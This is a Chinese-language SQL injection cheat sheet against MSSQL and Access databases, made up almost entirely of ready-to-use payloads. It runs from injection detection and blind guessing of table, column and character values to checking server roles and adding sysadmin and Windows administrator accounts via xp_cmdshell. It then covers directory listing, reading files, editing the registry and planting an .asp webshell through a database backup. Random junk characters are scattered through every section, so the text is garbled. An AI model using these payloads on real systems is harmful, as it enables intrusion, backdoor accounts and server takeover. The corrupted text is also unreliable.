1.判断是否有注入;and 1=1 ;and 1=2 t.]e8=dE
2.初步判断是否是mssql ;and user>0 wTn"
51puR8AG>
3.注入参数是字符'and [查询条件] and ''=' *KPNWY9!W
<< aAYkx<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ?r R,
h{~
6S?*z
`v
5.判断数据库系统 _'P!>C!
gX]'RBTb
;and (select count(*) from sysobjects)>0 mssql Es+BV+x[.c
M!iYj+nrP
;and (select count(*) from msysobjects)>0 access (ChL$!x
p"q4R2_/jh
tH9BC5+r}
`BY&&Bv#?
6.猜数据库 ;and (select Count(*) from [数据库名])>0 &uxwz@RC0
Nk shJ2
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %|3NCyJ*7
z.*=3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ETq~,g'
-42jeJS
9.(1)猜字段的ascii值(access) ]|/\Sd
!Baq4V?KN
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ysQ8==`38i
CfjVx
(2)猜字段的ascii值(mssql) x2z%J,z@4
>=ng?
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 g/ x\#W
G
4C 7
10.测试权限结构(mssql) i)+2?<]
+FYhDB~m
QfsTUAfR
[X=Ot#?u ~
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- {1]Of'x'
ZTP&*+d
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ch]Q% M
A[X~:p.^G
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 2bt2h.a
c>e~$b8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- qEB]Tj e[
.\b# 0w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- xZ(VvINL'
6IC/~Woghx
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /(skIvE|
!_=3Dz
;and 1=(select IS_MEMBER('db_owner'));-- ]0)=0pc]E
Q2ky|
[<7Vv_\Q
dtUt2r)6L;
11.添加mssql和系统的帐户 k{j (Gb2sp
D3-H!TFpDb
;exec master.dbo.sp_addlogin username;-- |DMa2}%
;exec master.dbo.sp_password null,username,password;-- j%OnLTZ
lBnG!!VrWa
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N}j^55M_]
`Hq)g1a7q
;exec master.dbo.xp_cmdshell 'net user username password R?$Nl
q=h~zjQ?R
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- oyY0!w,Y
~85Pgb<
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Yet!qmZ
QH_I<Y:n
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 5\$8"/H
p;m2RHYF
}w8:`g'T0/
1A b=1g{
12.(1)遍历目录 kKRZ79"7s
_<1uO=km6
;create table dirs(paths varchar(100), id int) o]|a5.O
^gD%#3>X
;insert dirs exec master.dbo.xp_dirtree 'c:\' CJu3h&Rp
f,}]h~w\
;and (select top 1 paths from dirs)>0 wH Q$F(by
e(m#elX
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) = A;B-_c
zg83->[
pg'3j3JW$
\;Ywr3
(2)遍历目录 53cW`F
B!cg)Y?.bd
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- fUgI*V
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 QR;E>eEq
'Nbae-pf
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 O[[#\BL
;n,@[v
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 @dj2#
P7i
G,i
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 p x1{=~V/
"'
hc)58y
|_J[n!~f7
RuHMD"
13.mssql中的存储过程 9(( QSX
aGY F\7
xp_regenumvalues 注册表根键, 子键 r{gJ[%
4(f4 4' ^
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
Qpc+1{BQ
6T5nr
xp_regread 根键,子键,键值名 EK6fd#J?1
:}Tw+S5
;exec xp_regread R~],5_|
3./4] _p
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 RrDNEwAr
OyG$ ]C
xp_regwrite 根键,子键, 值名, 值类型, 值 007SA6xq
HV??B :
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 )MKzAAt~
;hOrLy&O
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 &T8prE?
/ 1jb8w'
xp_regdeletevalue 根键,子键,值名 Tv&-n
{1y-*@yU(
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 "gD)Uis
(f 0p
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 TB
gD"i-
OwwlQp ~!J
EQkv&k5X
\Om<
FH}
14.mssql的backup创建webshell 6uYCU|JsU
z Lw=*
use model /?jAG3"
tndtwM*B'
create table cmd(str image); 5CxD ys&<
=yfLqU
insert into cmd(str) values (''); %jK-}0Tu
c D+IMlT
backup database model to disk='c:\l.asp'; 9 T4x1{mO
MEQ:[;1
XQu~/{A=
fL8+J]6A6
15.mssql内置函数 p*rBT,'
pNo<:p
;and (select @@version)>0 获得Windows的版本号 05\A7.iy
{iqH 27\E
;and user_name()='dbo' 判断当前系统的连接用户是不是sa h,q%MZ==^s
L_.BcRy
;and (select user_name())>0 爆当前系统的连接用户 9IKFrCO9,
VN[h0+n4Th
;and (select db_name())>0 得到当前连接的数据库 /!kKL$j
g(\FG
63d'
fgVp
L[d7@
16.简洁的webshell Y#_,Ig5.
d*Y&V$?zl
use model .,pGW8Js
>ln% 3=
create table cmd(str image); 9d4PH
dlC)&Ai
insert into cmd(str) values (''); zLlu%Oc
M?4)U"_VE
backup database model to disk='g:\wwwtest\l.asp';